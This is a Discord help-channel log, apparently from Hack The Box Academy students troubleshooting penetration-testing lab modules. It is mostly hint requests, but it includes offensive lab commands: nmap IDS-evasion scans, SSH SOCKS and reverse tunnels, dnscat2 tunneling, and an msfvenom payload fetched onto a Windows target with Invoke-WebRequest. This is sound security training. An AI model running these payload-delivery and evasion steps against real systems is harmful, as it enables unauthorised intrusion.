#modules

1 messages · Page 337 of 1

sick whale
#

soooo I'm really lost in this module. Like the concept are dead easy, whyyyyy would that be a struggle like this to get the questions haha

shut quest
#

I would assume like the other modules if you review it, it should steer you in the right direction.

autumn pilot
#

Take a break, it helps

brave scroll
#

I am facing this issue when try to login to MySQL

cloud urchin
#

probably have to allow for a self signed cert

brave scroll
#

what that means?

brave scroll
cloud urchin
#

yeah idk, just guessing, i don't know that much about the mysql command specifically

full echo
#

Can anyone help me with the Secure Coding 101 Assessment "On '/Reverse' you will find an obfuscated JavaScript code, but it appears to be broken, and doesn't return the flag! Try to reverse it to understand how it should be working, and fix it to get the flag." ,please?

I deobfuscated the code already, however I'm still struggling to identify the key.

Thank you in advance!

rustic sage
#

My brain is so fried with the Password Attacks module

storm elk
rustic sage
wise whale
#

Any hints to solve "Enumerate the custom script that is running on the system and submit its output as the answer." this questoin in snmp enumeration stuck for long time in this question

autumn pilot
#

review the data you've gathered

dusk haven
storm elk
dusk haven
storm elk
#

Thing is with clicking the link, if I am on my mobile, it will open it in discord browser and I will have to login again

#

and then I am just like, nope, too much effort 🙂

#

and I am sure other people have the same 😅

dusk haven
storm elk
#

what issue are you having?

#

were you able to download the flag?

dusk haven
storm elk
#

the current directory you're having your shell in

sinful narwhal
#

anyone please help me, I'm stuck at 'DNS Tunneling with Dnscat2' (Pivoting, Tunneling, and Port Forwarding)

dusk haven
storm elk
#

When you open a shell, it will be running from a certain directory

#

you can find the current directory by running the pwd command

dusk haven
storm elk
sinful narwhal
storm elk
sinful narwhal
storm elk
#

If you're connected with rdp, are you running it from powershell and running the command exactly as explained in the section?

nova ginkgo
#

Hello can someone help me pls

Attacking Common Applications - Skills Assessment I
Exploit the application to obtain a shell and submit the contents of the flag.txt file on the Administrator desktop.

I found website_backup in ftp but I dont have acces to get then I found vuln apache tomcat and I find exploits but there are not worked

sinful narwhal
# storm elk If you're connected with rdp, are you running it from powershell and running the...

PS C:\Users\htb-student> Import-Module .\dnscat2.ps1
Import-Module : The specified module '.\dnscat2.ps1' was not loaded because no valid module file was found in any
module directory.
At line:1 char:1

  • Import-Module .\dnscat2.ps1
  •   + CategoryInfo          : ResourceUnavailable: (.\dnscat2.ps1:String) [Import-Module], FileNotFoundException
      + FullyQualifiedErrorId : Modules_ModuleNotFound,Microsoft.PowerShell.Commands.ImportModuleCommand
dusk haven
# storm elk ping me if you need any more help 🙂

Still lost on this. I have the following: smb: \flag> get flag.txt
getting file \flag\flag.txt of size 33 as flag.txt (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \flag>
Then what do I do to access the folder called 'flag' and submit the contents of the flag.txt file.

sinful narwhal
dusk haven
slate flint
#

Any hints to solve "Enumerate the custom script that is running on the system and submit its output as the answer." this questoin in snmp enumeration stuck for long time in this question
used every thing nmap script snmpwalk braa but still not getting it

storm elk
safe star
#

i suggest doing the linux fundamentals module if you haven't already @dusk haven

storm elk
#

but yes, follow linux fundamentals like TLattice said

sinful narwhal
storm elk
#

you sure its there?

#

show me

#

as its a tier2 , feel free to dm me

#

will reply in 10 minutes, gotta do something first

dusk haven
storm elk
#

you need to exit this tool first

dusk haven
dusk haven
storm elk
#

great job 🙂

grand portal
lofty sparrow
#

need some help with the icmp tunneling with socks section of pivoting tunneling and port forwarding module, cant seem to get nmap to work with proxychains

#

anyone free to dm

rustic sage
finite abyss
strange delta
#

Hello. Ive problem in SHELLS & PAYLOADS : The Live Engagement

I can not find any wroking browser on the machine that ive connected with rdp. Is it normal ??

limber river
#

you can use you own browser , then copy paste anything you need

strange delta
#

but i can not connect to host 1 on my own browser

fathom pendant
#

No

#

But firefox exists on the jump host (10.129.x.x)

fathom pendant
wary plover
#

welcome back marcie 🙂

shut vapor
#

ahoy, it is marcielee

pine vault
wary plover
#

@naive sage here use this

next bronze
naive sage
#

stuck here

wary plover
# next bronze *use these

no it's this because these would imply that you have sent multiple mesages but it's all contained in one codeblock

next bronze
wary plover
wary plover
limber river
naive sage
dapper moth
#

Anyone for a nudge on the HTTP Attacks Skills Assessment?
I'm able to perform a TE.CL from TE.TE and from Gunicorn but still the second request gets picked by the waf.... don't know if I have to double encode the blacklisted characters or what

dapper moth
hot owl
#

yeah

#

misconfiguration one

#

i am getting issue at word list can you help me?

#

./go/bin/Web-Cache-Vulnerability-Scanner -u http://94.237.54.170:56841/ -sp language=en -gr
WCVS v1.0.0 started at 2024-10-03_14-01-29
Exported report ./2024-10-03_14-01-29_WCVS_Report.json
wordlists/headers: open wordlists/headers: no such file or directory

dapper moth
hot owl
#

okay

midnight galleon
#

is using crackmapexec module worth it? considering everyone is using nxc now

pseudo kiln
#

it's the same syntax, so yes

dusk totem
#

Im on "Introduction to python3" "the first iterations" and i have a question going: What is the 3rd most used word on the exercise target website? but for some reason i cannot access that Target ip neither from my device nor the pwnbox. Does someone have an Idea what i might be doing wrong?

sonic plume
#

check your vpn

dusk totem
thorn walrus
#

Bill Gates report on HTB Academy for the Login Brute Forcing module? kek

next bronze
dusk totem
void hemlock
#

Module: Attacking Authentication Mechanisms
Section: Skills Assessment
Can I ping someone for a quick hint? I||'m pretty sure that I need to use the jwk exploit but the application doesn't seem to arbitrary certificate / public key. thanks||

opal nexus
#

Just finished 'Using Crackmapexec' module. I didnt see here people who did finish it, so if anyone is stuck in the skills assessments i'm available for help.

limpid hemlock
#

Does anyone knw in the windows priv esc module situational awareness section how to find out what executable other than cmd.exe is blocked by app locker

sick whale
#

Ok I'm back at it and I need help :p

The new Bruteforce login module, Skill assessment part I.
We're given a username list and a password list.
I don't see anything in the (very short) assessment description/question that leads me to anything else but feeding these to hydra to bruteforce the basic auth login of the target.

Problem: that is HUGE and would take 12 to 24h depending on network speed apparently...

Question: wtf 😄 What am I missing, or should I actually go through the whole cutting one word list in pieces, and fork hydra so that it can be achieved in the 90min lifetime of the target? Any help appreciated 🙂

quiet trout
limpid hemlock
#

Hey any help here

#

Does anyone knw in the windows priv esc module situational awareness section how to find out what executable other than cmd.exe is blocked by app locker

sick whale
quiet trout
#

oh right, use that one then

#

shouldnt take too long

sick whale
#

12-24h 😄 But now I am wondering if there is not an issue with that wordlist being way over the 200 lines it should have according to its name :p

#

YES ok, I must have really messed up with the wordlist somehow

#

I will download it again, mine was WAY too big

nova cobalt
#

Hey guys,
I am currently trying to answer the last question from this Section:

INFORMATION GATHERING - WEB EDITION
Utilising WHOIS

"What is the admin email contact for the tesla.com domain (also in-scope for the Tesla bug bounty program)?"

I couldn't see that information with whois, so I decided to take a look on their bug bounty program.
But the address that is given there (starts with vulnerability...) does not solve the question.

Could you give me a small hint?
I think I am missing something here.

loud dagger
#

holy hell taking a break makes a world of a difference

#

yesterday i was doing a lab and i found a file that i spent like 2 hours figuring out what to do with and then i decided to call it quits for the night, it turns out it was a red herring and i logged on this morning and figured it out in about 5 minutes

loud dagger
#

or use grep if you don't want to read all of that

nova cobalt
surreal chasm
#

Hey, need some help with the module Network Enumeration with Nmap, the hard lab.
Even when I go to http://<ip>/status.php the alerts go to 50-60 out of 75 without me doing anything...
Every subtle NMAP enumeration after sometime bans me by the IPS.

nova cobalt
topaz plinth
#

Im stuck in a Skills Assessment Challenge in Intro to windows command line. Anyway i can get help here?

neat pelican
#

you can just state your concern @topaz plinth someone here would answer it

quiet trout
#

its there, just grep for it

quiet trout
topaz plinth
#

Im on the 5th question " User4 has a lot of files and folders in their Documents folder. The flag can be found within one of them."
and ive tried almost every command i can fathom and im just not able to see the contents of the files. I can see the tree but the files in the tree.

quiet trout
opal nexus
# limpid hemlock Hey any help here

try use 'Get-AppLockerPolicy' based powershell command. I will leave it to you to complete, if you really got stuck i will give you the full command.

surreal chasm
# quiet trout whats your full nmap cmd you're using?

sudo nmap 10.129.17.124 -F --script banner -Pn -n --disable-arp-ping --packet-trace --source-port 53 -T 1
Currently I'm running this scan for like 20 min and nothing detected me
sometimes im pinging the machine or doing a curl to /status.php to see how many alerts detected me

polar wyvern
#

uhhhh who do i message if my account has been completely messed up

quiet trout
surreal chasm
quiet trout
#

also you're using the -F for fast scan im not sure if that merely limits the number of ports or scans more aggressively (ie: more suspicious to IPS) or both. you'll know soon enough i reckon though

#

if you're attempting to evade IDS/IPS then the "lesson" in the exercise would be regarding the -T option

surreal chasm
#

-F is for top 100 ports

quiet trout
#

so if you get lucky here with your scan, move on if you want but know that the -T option is where you wanna be for evasion

surreal chasm
#

I'm using -T

quiet trout
#

oops i didnt catch that

#

yeah you should be succesful here

surreal chasm
#

But its so slowww

quiet trout
#

plenty of ingredients in the cake on that cmd

surreal chasm
#

I think the problem was when the machine first initialized, because when i checked <ip>/status.php it was showing 50 alerts out of 75
and after the ban was expired the number of alerts was resetting back down to 0 and now it works

topaz plinth
quiet trout
surreal chasm
quiet trout
#

you need to check the man page for those cmds to see how they're used you cant just type them in, they require args to return results

#

i believe that is touched on in the modules, to some extent. if memory serves me correctly

quiet trout
#

ok so try the ... | findstr HTB* (or whatever the flag convention is) you've identified the files with gci now find the str inside it

dapper moth
# topaz plinth

You are trying to pass a PowerShell cmdlet in CMD. It won't work that way

quiet trout
#

ah, didnt catch that

dapper moth
#

Either pass it as an argument to powershell

quiet trout
#

but situation remains the same, you know the files, you need to findstr them, gci is good for finding the files, then findstr for the flag contets

#

findstr should have a recurse cmd, or create a loop

#

apologies if this seems tough, i reckon you might be new to this, but these are essential workflows

dapper moth
#

In PowerShell

dapper moth
quiet trout
#

@topaz plinth not sure if this is self evident, but once you're in cmd.exe you need to launch powershell with a powershell.exe cmd, or just open powershell from start menu, then run the above cmd from b5null

dapper moth
#

Anyone for a couple of pointers in the HTTP Attacks Skills Assessment?
This thing is driving me insane

topaz plinth
dapper moth
#

Or powershell -Command "Your-PowerShell-Command"

surreal chasm
coral crest
#

were you able to finish this topic? This entire module is based on errors, I take more time troubleshooting instead doing the tasks.
I am stuck on dll errors (and yes, the real time protection is disabled and the folder listed as exception, just in case).

dapper moth
tender nimbus
#

Hey guys anyone for this awnser? i already found it by looking for the default creds on internet but wanna know if there is a certain command? Its the password cracking module

storm elk
#

@rustic sage please don’t post flags, even if they might be wrong 🙂

storm elk
#

Feel free to dm me 🙂

surreal chasm
tender nimbus
#

just want to know if the point of this question was to find the default creds on internet or to use a certain command ^^

dapper moth
gentle owl
#

Do you pay extra for the HTB labs (monthly r so) after paying for the academy (Pentester path)?

storm elk
#

Yes, they’re different platforms. But only if you want to play the retired content, want private instances or use pwnbox

gentle owl
#

Oh! I need more clarity, please. Doesn't the HTB academy subscription include machines to learn/practice with? I am not talking about the 20 free machines you get for a trial!

I am trying to use the Parrot terminal to practice what was illustrated in the modules, but I am not getting the same results as shown in the modules.

I am new to this and trying to figure things out. TY

storm elk
#

Both separate subscriptions 🙂

earnest pasture
#

Were you able to solve it?

celest sigil
earnest pasture
gentle owl
#

This is what they got from the module I am on:

nmap -sC -sV -p21 10.129.42.253

Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-20 00:54 GMT
Nmap scan report for 10.129.42.253
Host is up (0.081s latency).

When I try to run the same command from the instance (my Workstation), it says the host is down

gentle owl
#

It shows on the top right corner that the VPN is running. No, I didn't connect to the VPN since I am running the instance straight from the workstation. I do not have the option to connect to VPN either.

shell ore
gentle owl
shell ore
gentle owl
#

That was a copy of what was illustrated in the module that I was trying to replicate. I was running the same command on my pwn box but it was saying host is down

wild sage
#

Hey I got a question, maybe someone can help me with. I'm doing the client side validation section in the File Upload attacks. I already got the flag by doing the Burp practice, but im trying to do it through the inspector portion and I've gotten to the command line portion. However, when I do the function file check. I get no response/output. Anyone know how to get it to produce output? I input the function and the file and get nothing

dapper moth
#

No one on the HTTP Attacks module?

limpid hemlock
#

Hey anyone knws answer to windows pr8v esc intial enumeration question 4 what user us logged into target host

#

I enterd net user and tried every name of user that i got but none worked any help

lofty whale
#

I am on the footprinting smb in the pentesters path and am down to the "find additional information about the specific share we found previously and submit the customized version of that specific share as the answer" question and I'm not understanding what it's asking for. Anyone help?

crimson eagle
#

Anyone know what I'm doing wrong here? I'm just working along with the example but I'm not getting the same result

#

From the example, it's .\SilkETW.exe -t user -pn Microsoft-Windows-PowerShell -ot file -p ./etw_ps_logs.json -l verbose -y C:\Rules\yara -yo Matches

opal nexus
lofty whale
#

@opal nexus Ty

limpid hemlock
#

Used it

#

Bro got a lost of users i tried none worked

opal nexus
limpid hemlock
#

I used net user not query

opal nexus
limpid hemlock
#

I got a user sccm_svc

#

Enterd it but that isnt it

lofty whale
opal nexus
opal nexus
limpid hemlock
#

No spaces that was all fine but that isnt the user name i guess

opal nexus
limpid hemlock
#

Yess

#

I got sccm_svc all small leters

#

I enterd that as the answer not working

#

Mm

analog dock
#

Don’t share answers to questions

limpid hemlock
#

Same

#

For me but doesnt wrk

opal nexus
# limpid hemlock Same

Well due to 0x56 instruction (I'm not sure if he is a moderator) or not I had to delete my screenshot, but maybe you should take it to technical support or something.

limpid hemlock
#

There was something wrond

analog dock
limpid hemlock
#

Every time i enterd the correct answer and hit submit it showed me wrong answer then i simply out that usrr name there didnt click submit just hit mark complete and continue as i had all other answers correctly now i come back and look it looks like it registerd that answer

#

This was a glitch i think from htb side

solar grove
#

Hello, I'm stuck on question 2 in the Pivoting, Tunneling, and Port Forwarding room. I captured the flag, but when I do a port scan with nmap on the target system, all ports are filtered and I cannot detect the rdp directly.

Question: Apply the concepts taught in this section to pivot to the internal network and use RDP (credentials: victor:pass@123) to take control of the Windows target on 172.16.5.19. Submit the contents of Flag.txt located on the Desktop.

bright pivot
opal nexus
solar grove
#

@opal nexusssh -D 9050 ubuntu@10.129.202.64

opal nexus
solar grove
#

$ tail -4 /etc/proxychains.conf

meanwile

defaults set to "tor"

socks4 127.0.0.1 9050

safe star
solar grove
#

@safe starYes I use -sT

#

I restarted the machine and will try again

opal nexus
rocky estuary
#

guys i'm doing web proxies and i'm using brup intruder to enum for .html in admin directory but it takes for ever is this normal ?

#

i think i will just use ffuf or gobuster to save time

safe star
solar grove
#

@opal nexustyped sudo and it worked thanks

safe star
rocky estuary
uneven cairn
#

Server-side Attacks

Skills Assessment

#

please help i dont get any post request i already crawl all the page

rocky estuary
timber hatch
#

Practical Digital Forensics Scenario
Investigate the USN Journal located at "C:\Users\johndoe\Desktop\kapefiles\ntfs%5C%5C.%5CC%3A$Extend$UsnJrnl%3A$J" to determine how "advanced_ip_scanner.exe" was introduced to the compromised system. Enter the name of the associated process as your answer. Answer format: _.ex

Am I right to use Chainsaw to solve this task, or did I take a wrong turn somewhere?

uneven cairn
echo roost
#

Kerberos Attacks - Kerberoasting from Linux - GetUserSPNs.py inlanefreight.local/pixis why the use the username pixis is you don't know any users?

#

or do you need to know at least one user?

#

ah nm you need to input a password. I was missed that

gray stratus
#

Did you ever figure this out? Mine get stuck on listening on [any] 9443 ...

fading violet
#

One message removed from a suspended account.

#

One message removed from a suspended account.

#

One message removed from a suspended account.

midnight galleon
#

if I have a socat process running and executing let's say a server.py
how can i make socat terminate when child process (server.py) exits

midnight galleon
#

even if I sent a SIGTERM from the child process it still doesn't quit

sick whale
#

SQL injection, is there any sort of setup to do on kali to get things working?

ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

Sounds like a CA issue?

uncut anchor
#

hey guys do you think the google cyber security certificate is worth getting?

sick whale
sick whale
safe star
#

Where u getting that error?

uncut anchor
#

@sick whale Flexible schedule
6 months, 7 hours a week
Learn at your own pace ---- it says 4-6 months to complete on here lol

sick whale
#

2 weeks if you have some linux cmd basis already, and spend 4-5h per day

sick whale
uncut anchor
#

yeah ur right, thanks bro. i just dont want to watse my time and money on something thats useless but you say its helpful starting out so ill give it a shot

sick whale
#

It's actually free haha

uncut anchor
#

week free yes after its i think 50 a month

#

either way if its helpful ill try it out

sick whale
# safe star Where u getting that error?

┌──(&(㉿$%^$)-[~/htb/sqlinj]
└─$ mysql -h 94.237.54.103 -u root -p -P 46002
Enter password:
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

uncut anchor
#

how do i get access to type in general i dont have permissions lmao

safe star
sick whale
#

okay thansk

#

Nope same

#

Must be some config on my side then

#

Tried sudo-ing it, doesn't change a thing, so it's not due to ownership of the CA

safe star
#

does it work on pwnbox

sick whale
#

Not tried yet, will do when I'm out of my meeting :p

hushed solstice
#

Network services

#

Help I’m stuck on the network services section of the Linux fundamentals

minor ocean
#

mongodb doesnt work on mypwnbox

spark monolith
inner canyon
#

Hi, in Using CrackMapExec in the Vulnerability Scan Modules section and I've encountered a problem. The exercise states: 'Authenticate to 10.129.230.129 (ACADEMY-CME-VULNSCAN-WS01) with user "Administrator" and password "IpreferanewP@$$".' However, while I can't authenticate using CrackMapExec, I am able to do so with Evil-WinRM. What am I doing wrong?

inner canyon
foggy monolith
#

More of a curiosity than anything, but why does searching the Dashboard for "setoolkit" and/or "blackeye.sh" not turn up anything? Seeing as though phishing is by far the most common means by which bad actors gain initial footholds, you'd think there'd be some modules dedicated to tools that make phishing easy to pentest against, but apparently not.

dapper moth
foggy monolith
#

Yeah, just not on the Academy ― we definitely need a module dedicated to it.

#

The only place where phishing is even briefly mentioned as far as the Academy goes is in one single section of the module I'm in right now, which is the XSS module. Tools like SET and BlackEye need more Academy attention.

gray yacht
safe star
safe star
river marsh
#

this might be a dumb question but what exactly makes a VM safer to run malicious code? like the VM is still running on my physical machine from a hypervisor. also i dont really get how network requests work. my VM isnt on the same subnet IP but doesnt its network traffic have to go through my machine to get to the internet?

ocean night
#

Because running with in a VM provides a degree of separation from your host VM

#

Your VM could be on the same subnet yes, or it could go through NAT, which also possible to access the host network

#

But generally it's a matter of isolation

#

If your VM gets fucked, you can always stop it and revert

#

If your host gets fucked, it's a whole other number of steps to get back to trusting your system.

snow mirage
#

gotta love it when your "logon procedure is prohibited"

river marsh
ocean night
#

Escaping from a guest to the host is certainly possible, and vulnerabilities have been around in the past

#

In the end, it's best effort

#

VMs are isolated from the host by the underlying virtualization features of your CPU / OS

#

If you want to go deeper, I'm not the person to speak to 😅

median kettle
#

in the Windows Priv esc module where you are having to take advantage of vulnerable services, my POC shell.ps1 script isnt connecting to my NC listener. has anyone beaten this or could give me pointers?

outer silo
#

Hey is anyone else stuck on "Create an "If-Else" condition in the "For"-Loop of the "Exercise Script" that prints you the number of characters of the 35th generated value of the variable "var". Submit the number as the answer."

#

I keep getting the answer 1197734

#

but it says it's wrong

foggy monolith
#

On XSS § Phishing, how long did any of you have to wait for a response? Because I prepared a working payload, used test:test credentials with my own IP to make sure that it works, and it showed up in netcat and everything. Went to send.php to make sure it sends properly ― "URL Sent!" Kept netcat open, and... crickets.

cloud urchin
#

didn't have to wait long at all

sick whale
#

Anyone would know how to get rid of this error in Kali:
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

Is there some specific modification of the configuration to do? mysql connects well on pwnbox.

#

(I'm in the SQL injection module but without access to the DB, it will prove... complicated 😄 )

cloud urchin
#

try finding a parameter that ignores ssl or doesn't need it

#

hard to say without knowing which section you're on

#

or what tool you're using

median kettle
#

im getting this error

sick whale
#

SQL injection -> using mysql to connect to the DB. Literally the first dumb question to makke sure your environment is well set up :p well it is not haha

cloud urchin
median kettle
#

@cloud urchin no sorry, how do i do that?

cloud urchin
cloud urchin
sick whale
#

Sorry "SQL Injection Fundamentals"

#

is the exact name

median kettle
#

@cloud urchin sorry stupid question, do i run that from the powershell enviroment on the victims box?

cloud urchin
median kettle
#

@cloud urchin im on the windows priv esc module, under the abusing vulnerable services section

cloud urchin
sick whale
#

I mean the question is straightforward, the command too, and it works on pwnbox.

But somehow it throws this error in Kali, and I have not touched anything on mysql config or anything (nor do I have used it more than a couple of times on boxes)

cloud urchin
sick whale
#

mysql

cloud urchin
#

what's your command syntax

sick whale
#

mysql -h 94.237.51.214 -u root -p -P 59607

#

which works fine on pwnbox

cloud urchin
cloud urchin
sick whale
#

No, password is entered after to avoid having it in cleartext in bash_history

#

(just tried passing it together, same error btw)

cloud urchin
#

so what command did you use

sick whale
cloud urchin
#

weird, that worked for me on kali

foggy monolith
ocean night
#

👆 they use Arch

#

😅

#

(sorry, couldn't help myself)

cloud urchin
#

i'm getting the same error trying it now too

sick whale
#

Or it worked in the past and now doesn't?

cloud urchin
#

i did the module a long time ago and it worked without that error in my notes

sick whale
#

Soooo maybe that's not me 😄 ?

#

(This is my nightmare: That this happens during the exam oO )

ocean night
#

Oh.. come on

#

SSL is required

cloud urchin
#

i got it working by using --skip-ssl

ocean night
#

but the server doesn't support

#

aye

foggy monolith
ocean night
#

Never tried Arch tbh

#

👆 they don't use Arch btw

sick whale
#

hahaha ok, that was an easy fix.

But what's the logic: SSL is required, so "skip it" ? How is it required then?
I don't get it haha

#

Thanks @cloud urchin btw!

cloud urchin
#

it's saying the command is requiring it, not the server

ocean night
#

I guess newer mysql client versions default to an SSL connection

cloud urchin
#

i think

ocean night
#

The skip argument reverts to previous behaviour (non-ssl)

sick whale
#

Aaaah ok, makes more sense.

#

Thanks!!

cloud urchin
median kettle
#

@cloud urchin nvm i got it, thanks for the help

foggy monolith
#

Garuda* but still valid points

cloud urchin
#

maybe some firewall rule or something?

foggy monolith
#

Come to think of it, since Garuda comes with the Fish shell by default — that could also be to blame.

#

Update: it was KFirewall after all. Had set it up for some unrelated reasons, and had to temporarily disable outright for this to work properly.

ocean night
#

Wrong thread, nvm..

foggy monolith
safe star
#

Yeah I had to do that with my Linux host, couldn’t get reverse shells

#

Sticking to kali vm from now on

foggy monolith
#

Curious if the custom HTB fork of Parrot actually has an ISO that one could download — would make this process much easier. Of course, just plain old Parrot VM could also suffice.

#

Reason for the inquiry about Parrot as a VM choice of course is that MATE > Xfce in terms of configurability. That being said, just spinning up a Parrot Docker container is also a possibility…

wary plover
#

yup it's on their site

foggy monolith
junior oxide
#

i have a question regarding active directory, more specifically Cross-Forest Kerberoasting. If we conducted the attack successfully and go the credentials (in this case for mssqlsvc in the "Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows" section) HOW do we use these credentials to access the other domain?

foggy monolith
#

If the account with a default username is an admin of one domain, it's likely to be an admin of multiple domains.

#

To elaborate: mssqlsvc is the account created automatically when a new instance of MSSQL Server is installed. So you're going to run into it quite often in the real world as a way into more than one domain.

junior oxide
#

assuming i got a non default username my real question is basically how do i access the OTHER domain with that account regardless if its default or not with the creds i obtained

foggy monolith
#

The section of the module that mentions Rubeus provides some important clues. I'll have to review my command history to see how exactly I did it, but it has something to do with overlapping ACLs.

junior oxide
#

they mentioned Enter-PSSesion but this is for the admin password reuse. However, i tried using it against the other domain with the mssqlsvc creds and always got an error so i basically did an attack and got a password but without the ability to access or see what the other domain have

foggy monolith
#

Alright, just remembered: recall from the Password Attacks module that there's a way to use a hash directly without cracking it…

#

I had to do a lot of reviewing of PA during my walkthrough of the skills assessment for that module, just a heads up. Having Password Attacks open in a separate browser tab is going to really help you.

junior oxide
#

i will try that along with enter-pssesion because i feel that the answer is here specially that i have the password in cleartext

junior oxide
foggy monolith
# junior oxide UPDATE: it worked using evil-winrm i had to pivot through the network and run my...

That's why Ligolo is your friend: https://youtu.be/qou7shRlX_s?si=J6l89mu3RBZXNfFX

https://jh.live/vanta || Prove your security compliance with Vanta! Get $1,000 off with my link: https://jh.live/vanta
The Pivoting Lab SnapLabs template: https://jh.live/pivoting

Free Cybersecurity Education and Ethical Hacking with John Hammond
📧 JOIN MY NEWSLETTER ➡ https://jh.live/email
🙏 SUPPORT THE CHANNEL ➡ https://jh.live/patreon
🤝 SPON...

▶ Play video
foggy monolith
foggy monolith
#

Just for fun, I chose to literally reuse the same username from the Academy PwnBox on this local install

rustic sage
#

Is it just me or the machines aren't spawning rn lmao

safe star
safe star
rustic sage
#

for like an hour already

safe star
#

I think you gotta use ctrl+shift+r or spawn another machine so it kills that one

rustic sage
#

I already did so many times

#

let me try it again and wait

foggy monolith
# safe star I was gonna do that, but I always end up getting a new kali machine

The only problem is the refresh rate. I cannot for the life of me figure out how to get it higher than 30Hz on my 4K display. With Plasma 6, that's no problem, but with MATE, it's next to impossible without needing to jump through some serious hoops.

Even adding "i915.modeset=1" to my kernel parameters did nothing to improve this.

steady matrix
#

Hi all, quick question on DACL2, we're provided with SharpHound collectors on the Windows box but not Bloodhound. Do we need to transfer the sharphound zip archive onto the pwnbox then? If yes how?

next bronze
steady matrix
uncut anchor
#

how did you guys learn the basics of cyber

safe star
#

Just did Tryhackme and getting destroyed in ctfs

uncut anchor
#

@safe star does tryhackme and hack the box give me the info necessary to complete certs like comptia

#

or would i have to expand

safe star
#

Yeah, more than enough, but you can just watch a course and memorize terms for those exams

#

Htb and THM help tho

uncut anchor
#

@safe star stupid question but what do you mean by course for the exams like what kind of course

safe star
foggy monolith
# foggy monolith The only problem is the refresh rate. I cannot for the life of me figure out how...

Fixing this required manually editing xorg.conf. To save others the trouble, should they ever decide they too want a PwnBox clone on their system:

Section "Monitor"
   Identifier    "Monitor0"
   HorizSync      30.0 - 135.0       
   VertRefresh    56.0 - 61.0
   Modeline      "3840x2160R"  533.00  3840 3888 3920 4000  2160 2163 2168 2222 +hsync -vsync
   Option        "Primary" "true"
EndSection

Section "Device"
   Identifier   "RocketLake-S"
   Driver       "intel"               
   Option       "UseEdidFreqs" "false"
   Option       "ModeDebug" "true"
EndSection

Wish this could be easier, but alas, it is what it is.

sleek moss
#

for cpts should i even take notes or should i learn go thr ueach module and fully understand it and then go back t othe academy when i need help for cpts?

#

bcos the notes are already on the website wats th epoint in making notes when it there u kno

safe star
#

I suggest taking notes, it becomes very annoying having to click the modules, wait for them to load, then look for certain things many times.

#

Plus notes help you understand topics in your own words

marsh fractal
#

Hello, I need a help on Attacking common applications - Joomla - Discovery & Enumeration : I spend my hours for bruteforce the admin password but it cant find ( I used rockyou.txt ) what can i do for that
do I really need to spend my days for finish to try whole wordlist?
or I am in the wrong way

slate halo
#

Hello, im doing Windows Privilege Escalation Skills Assessment - Part II and im on question 2 trying to escalate privileges to SYSTEM. I got a shell using msfvenom but is not nt system and also I tried adding a user to the admin group it didnt work.

shut quest
shell ore
marsh fractal
#

ty bro

#

i see the problem

#

and find the password

slate halo
digital crown
#

if i'm enrolled as a student and certain tier II module is done in 80% and then I upgrade to platinum, will this module be locked up AND zeroed?

#

because I'm not sure about second part

storm elk
#

No

digital crown
#

thanks

storm elk
#

It should just stick with 80%

shell ore
#

he would need to unlock it with cubes, but continue from where he left off

cold marsh
#

hello dude, i need help with Attacking DNS module.
DM me pls

shell ore
storm elk
#

I am not 100% sure about the locking up bit, I would suggest to ask support indeed

cold marsh
shell ore
cold marsh
#

attacking DNS, part of CPTS

#

i mean, attacking common services - attacking DNS section

shell ore
cold marsh
#

ups 😐

shell ore
#

ok lemme see DMs

surreal chasm
#

Hey, i'm stuck on Firewall and IDS/IPS Evasion - Hard Lab in module Network Enumeration with NMAP
This is the question
Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer.
I've found the ports ||22,80,50000||, and the 3rd port running ||ibm-db2||.
Is it like a ctf, should I connect to the service? or what? this whole lab is a bit confusing me..
The command im running ||sudo nmap -p50000 -sV -v -Pn -n -g 53 10.129.56.157||

hexed epoch
#

how to make an undetecable payload

#

can anyone tell us

dapper moth
surreal chasm
surreal chasm
eager siren
#

Guys hello, i am currentl at Attacking Common Applications - Skills Assessment I, i managet to list the contents of the Adminstrator Desktop (dir) but when am trying to get the flag i cant get it i tryied many ways (type, more, echo, less)

tender nimbus
next bronze
next bronze
tender nimbus
eager siren
#

myabe i am on the wrong path for exploiting this

next bronze
#

spoilers, make sure to use the full path

tender nimbus
eager siren
#

sorry for that, i do use the full path, C:\full\path\to\flag

tender nimbus
next bronze
eager siren
#

thank i will try

next bronze
#

but you might want to create a revshell with it

tender nimbus
#

password cracking module default cred section

#

question is "i already have the awnser btw"

next bronze
#

well maybe check for open ports and try default credentials

midnight galleon
#

What a good note taking app for studying in the academy?
I have reached the end of echoing into filescatHiss

viral lotus
naive sage
viral lotus
#

I like open source (free) I hear obsidian is fairly good

naive sage
#

If askin' what to use?, go for Obsidian.

viral lotus
#

I wouldn't use notion, I found when trying to collate all my notes it was a real pain unless you have a subscription

midnight galleon
naive sage
#

I mostly saw CT / Notion and ofc Obsidian.

viral lotus
#

I have like 7-8 years of CTF, course and work related notes, thing I regret is having them all over the place even now so when I am looking for something specific it can be a pain, especially if its on pen and paper (don't judge I was new lol)

midnight galleon
viral lotus
midnight galleon
old oasis
naive sage
vocal rover
#

I have an issue in Nmap module where in 03 page it is asking for question but there is no machine or IP available for scanning?

limber river
#

@naive sage welcome to modules channel

solar grove
#

ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN

Which ip should come to <InternalIPofPivotHost> in the command.

Attack Host ----ssh ----- ubuntu --> Windows machine
Ubuntu and Windows machine on the same network. Attack host only has ssh connection with ubuntu

viral lotus
vocal rover
#

Seems like it is asking for answer based on above results.

viral lotus
vocal rover
#

Yes. right this one

viral lotus
#

have you had a look at the hint?

midnight galleon
naive sage
#

Your welcome.

midnight galleon
solar grove
#

@midnight galleonYes, I wrote that. I connected to the Windows machine the old fashioned way, by creating a tunnel. Because there is no program on the ubuntu machine that I can connect with rdp. I did everything right but the reverse shell meterpreter session does not come up, I guess it might be confused because I created these 2 tunnels

viral lotus
quiet trout
quiet trout
solar grove
#

@quiet troutYou're right, but that's not the point. I've solved the room, but I'm trying the things it shows in the room, but it's not working. It's incomplete.
1- We create a payload from msfvenom from the attack host and send it to the ubuntu machine via ssh.
2- We create python server from ubuntu server and send this payload to windows machine.
3--Invoke-WebRequest -Uri “http://172.16.5.129:8123/backupscript.exe” -OutFile “C:\backupscript.exe”
command to download and run the payload.
